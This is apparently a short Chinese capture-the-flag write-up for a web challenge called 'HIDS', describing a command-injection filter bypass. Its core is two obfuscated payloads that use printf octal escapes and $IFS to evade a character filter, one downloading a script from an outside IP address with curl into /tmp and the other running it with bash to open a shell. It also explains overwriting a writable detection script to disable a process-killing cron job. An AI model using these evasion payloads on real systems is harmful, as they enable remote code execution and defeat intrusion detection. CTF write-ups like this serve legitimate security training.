[Web] HIDS xp0int Posted on Apr 29 2021 0-9a-z()$> 等来执行命令 用八进制绕过 ,空格就$IFS, ``` 弹shell cmd=$(printf$IFS"\57")bin$(printf$IFS"\57")bas"h"$IFS$(printf$IFS"\57")tmp$(printf$IFS"\57")123 cmd=cur"l"$IFS$9$(printf$IFS"\64")7$(printf$IFS"\56")92$(printf$IFS"\56")94$(printf$IFS"\56")194$(printf$IFS"\57")shell>$(printf$IFS"\57")tmp$(printf$IFS"\57")123 ``` flag运行90s出结果,有一个定时任务会kill进程,detect.py可写,直接覆盖就不会执行kill进程 , /readflag 等90s得到flag 打赏还是打残,这是个问题 赏 Wechat Pay Alipay [Pwn] pwn1 - cpt.shao [Reverse] PE - Cew
没有帐号? 立即注册